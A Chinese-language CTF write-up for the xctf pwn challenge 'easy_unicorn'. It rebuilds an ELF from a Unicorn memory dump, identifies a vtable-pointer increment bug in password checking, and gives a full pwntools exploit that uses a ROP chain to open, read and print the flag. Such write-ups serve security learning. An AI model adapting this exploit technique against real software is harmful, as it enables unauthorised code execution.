xctf easy_unicorn

2020-09-10

xctf今年第一场分站赛的一题pwn题

前言

赛后想复现，一直鸽到现在，解出来还是挺高兴的把

分析

题目名字叫easy_unicorn，看这名字就知道是和unicorn相关的，反编译题目给的程序(x86_sandbox)后，可以看到程序load了同目录下的xctf_pwn.dump，分配内存，然后映射内存地址，最后执行，但是直接拿ida反编译xctf_pwn.dump是不行的，先放着

查看程序x86_sandbox，我们可以看到x86_sandbox有一个debug和info的选项，跑起来效果：

这个info选项给的消息很有用，我们对着它的输出来恢复下xctf_pwn.dump

写了个粗糙的脚本：

f = open("./log.txt","rb")

segments = []
for i in f.readlines():
	segments.append([x.strip() for x in i.split('|') if x.strip() != ''])

def cmpp(a,b):
	a_value = int(a,16)
	b_value = int(b,16)
	if(a_value > b_value):
		return 1
	else:
		return -1

segments.sort(cmp=cmpp,key = lambda s:s[1])

for i in segments:
	print i

f.close()

out = open("./out.elf","wb")
in_ = open("./xctf_pwn.dump","rb")

for seg in segments:
	if "heap" in seg[0]:
		break
	foa = int(seg[2],16)
	length = int(seg[3],16)
	in_.seek(foa)
	data = in_.read(length)
	out.write(data)
	
in_.close()
out.close()

log.txt的内容：

# cat log.txt
| .gcc_except_table            |            401e64  |               f5c  |         24 |
| debug001                     |      7ffff783b000  |               f88  |       4000 |
| .data                        |            603090  |              4fb8  |         10 |
| libc_2.23.so                 |      7ffff7475000  |              5008  |     1c0000 |
| .fini                        |            4015a4  |            1c5008  |          9 |
| .plt                         |            4009f0  |            1c5111  |        100 |
| .jcr                         |            602e00  |            1c5211  |          8 |
| ld_2.23.so1                  |      7ffff7ffc000  |            1c5219  |       1000 |
| ld_2.23.so2                  |      7ffff7ffd000  |            1c6219  |       1000 |
| LOAD                         |            400000  |            1c7239  |        9c8 |
| .init                        |            4009c8  |            1c7c01  |         1a |
| [stack]                      |      7ffffffde000  |            1c7c1b  |      21000 |
| libstdc__.so.6.0.21          |      7ffff7a55000  |            1e8c2b  |     172000 |
| LOAD2                        |            400af8  |            35ac3b  |          8 |
| .fini_array                  |            602df8  |            35ac43  |          8 |
| .prgend                      |            6031d8  |            35ac4b  |          1 |
| libstdc__.so.6.0.212         |      7ffff7dc7000  |            35ac4c  |       a000 |
| libstdc__.so.6.0.213         |      7ffff7dd1000  |            364c4c  |       2000 |
| .plt.got                     |            400af0  |            366c4c  |          8 |
| libstdc__.so.6.0.211         |      7ffff7bc7000  |            366c54  |       d000 |
| ld_2.23.so                   |      7ffff7dd7000  |            373c54  |      26000 |
| libgcc_s.so.1                |      7ffff783f000  |            399c54  |      16000 |
| libgcc_s.so.11               |      7ffff7a54000  |            3afc54  |       1000 |
| libm_2.23.so1                |      7ffff7274000  |            3b0c54  |       2000 |
| libm_2.23.so3                |      7ffff7474000  |            3b2c54  |       1000 |
| libm_2.23.so2                |      7ffff7473000  |            3b3c54  |       1000 |
| debug004                     |      7ffff7ffe000  |            3b4c5c  |       1000 |
| xctf_pwn                     |            401e88  |            3b5c74  |        178 |
| LOAD1                        |            4009e2  |            3b5dec  |          e |
| LOAD3                        |            4015a2  |            3b5dfa  |          2 |
| LOAD5                        |            4019a7  |            3b5e04  |          1 |
| LOAD4                        |            4015ad  |            3b5e05  |          3 |
| LOAD7                        |            602e08  |            3b5e08  |        1f0 |
| LOAD6                        |            401a84  |            3b5ff8  |          4 |
| [vdso]                       |      7ffff7ffa000  |            3b5ffc  |       2000 |
| .text                        |            400b00  |            3b7ffc  |        aa2 |
| libc_2.23.so3                |      7ffff7839000  |            3b8b5e  |       2000 |
| libc_2.23.so2                |      7ffff7835000  |            3bab5e  |       4000 |
| libc_2.23.so1                |      7ffff7635000  |            3beb5e  |       9000 |
| .rodata                      |            4015b0  |            3c7b5e  |        3f7 |
| .got                         |            602ff8  |            3c7f55  |          8 |
| .got.plt                     |            603000  |            3c7f5d  |         90 |
| .eh_frame_hdr                |            4019a8  |            3c7fed  |         dc |
| .bss                         |            6030a0  |            3c80c9  |        138 |
| extern                       |            6031e0  |            3c8201  |         98 |
| libm_2.23.so                 |      7ffff716c000  |            3c8299  |     108000 |
| [vsyscall]                   |  ffffffffff600000  |            4d0299  |       1000 |
| [heap]                       |            604000  |            4d1299  |      32000 |
| .init_array                  |            602df0  |            503299  |          8 |
| .eh_frame                    |            401a88  |            5032a1  |        3dc |
| debug003                     |      7ffff7fe7000  |            50367d  |       6000 |
| xctf_pwn3                    |            603278  |            50967d  |        d88 |
| xctf_pwn1                    |            602000  |            50a405  |        df0 |
| xctf_pwn2                    |            6031d9  |            50b1f5  |          7 |
| debug002                     |      7ffff7dd3000  |            50b1fc  |       4000 |

这样我们就可以得到一个可以ida反编译的文件，但是跑不起来就是了，如果要跑起来，应该还需要进一步的修复，但是直接静态的看也能解

这逻辑基本能看的很清楚了，我们找到要我们输入passwd的地方，找到它生成code的算法，在反着解回去就行，生成code的算法：

逆推回去即可，输入password成功的话，程序会叫我们想不想要flag，输入y的话，程序会试图打开flag文件，但是会被syscall_hook劫持，返回-1的fd，所以不能输出flag：

但是我们可以看到，他打开的fd没有被关闭，接着再看其它的syscall_hook，发现我们只能用：read,write,open,close,newfstat,mmap,brk,exit这些系统调用，所以考虑orw来拿flag

程序执行完询问你要不要flag就结束了，并没有什么可以拿来利用的地方，所以得继续找下漏洞

漏洞点

最终是在询问密码这里的地方发现了漏洞点：

signed __int64 __fastcall sub_400DDE(__int64 a1, void *a2)
{
  char *s2; // ST18_8
  signed __int64 result; // rax

  s2 = sub_40102A((char *)a1);
  if ( !memcmp(a2, s2, 0x10uLL) )
  {
    puts("WOW. you can really dance. \n");
    result = 1LL;
  }
  else
  {
    sub_401120((_QWORD *)a1);
    puts("\x1B[1;33mtry again\x1B[0m\n");
    result = 0LL;
  }
  return result;
}

跟进sub_401120：

_QWORD *__fastcall sub_401120(_QWORD *a1)
{
  _QWORD *result; // rax

  result = a1;
  ++*a1;	//!!!!!
  return result;
}

那个++*a1的地方就是漏洞所在，这个好像是虚函数表的指针，这个类的虚函数表指针指向0x401900：

我们可以一直输入错误的密码32次，使其指向0x401920，最后在输入正确密码后就不是问我们要不要flag，而是跳到那个shell的函数，我们有一次任意call的机会：

我的思路是：

既然程序给了栈的地址printf("data ptr:%p\n", &buf);这一句，那我们就调用read函数来做rop
先open("flag.txt",0)，前面说过，fd并没有被关闭
接着read(3,buf,0x80)，最后write出来就好

最终exp：

from pwn import *

context.arch = 'amd64'

# context.terminal = ["tmux","split-window","-h"]
	
def main(host,port=5005):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process(["./x86_sandbox","-debug"])
		# p = process("./x86_sandbox")
		# gdb.attach(p)
		gdb.attach(p,"b *0x000000000403D01")
	p.recvuntil("Your machine-code is ")
	p.recvuntil(" ")
	code = p.recvuntil(" ")[:-1]
	code = (''.join([p32(int(x,16)).encode('hex') for x in code.split('-')])).decode('hex')
	info(code.encode('hex'))
	code = [ord(x) for x in code]
	
	for i in range(len(code)-2,-1,-1):
		code[i] ^= code[i+1]
	for i in range(0x20):
		p.recvuntil("your password << ")
		p.sendline("")
	p.recvuntil("your password << ")
	passwd = (''.join(map(chr,code))).encode('hex')
	
	info(passwd)
	p.sendline(passwd)
	
	p.recvuntil("data ptr:")
	ptr = int(p.recvuntil('\n')[:-1],16)
	info("ptr: " + hex(ptr))
	p.recvuntil("<<")
	
	read = 0x400A30
	read_got = 0x603030
	puts = 0x400A10
	p_rdi = 0x401593
	p_rsi_r15 = 0x401591
	ret = 0x400FD8
	p_rsp_rrr = 0x40158D
	open_flag = 0x400D35
	# LOAD:000000000040158A                 pop     rbx
	# LOAD:000000000040158B                 pop     rbp
	# LOAD:000000000040158C                 pop     r12
	# LOAD:000000000040158E                 pop     r13
	# LOAD:0000000000401590                 pop     r14
	# LOAD:0000000000401592                 pop     r15
	# LOAD:0000000000401594                 retn
	
	# LOAD:0000000000401570 loc_401570:                             ; CODE XREF LOAD:0000000000401584
	# LOAD:0000000000401570                 mov     rdx, r13
	# LOAD:0000000000401573                 mov     rsi, r14
	# LOAD:0000000000401576                 mov     edi, r15d
	# LOAD:0000000000401579                 call    qword ptr [r12+rbx*8]
	rop_chain = [
		p_rdi,0x4017A3,open_flag,0x40158A,0,1,read_got,80,ptr+0x800,3,0x401570,
		ret,ret,ret,ret,ret,ret,ret,ret,ret,ret,ret,
		p_rdi,ptr+0x800,puts
	]
	
	p.sendline(p64(ret)*0x10+flat(rop_chain))
	
	p.sendlineafter("<<",str(read))
	p.sendlineafter("<<",str(0))
	p.sendlineafter("<<",str(ptr+0x518))
	p.sendlineafter("<<",str(0x100))
	
	pause()
	
	rop_chain = [
		p_rsp_rrr,ptr+0x10
	]
	
	p.sendline(flat(rop_chain))
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	main(args['REMOTE'])

后记

这题花了挺长时间才复现出来的，比赛的时候肯定是没这没多时间解这个题目了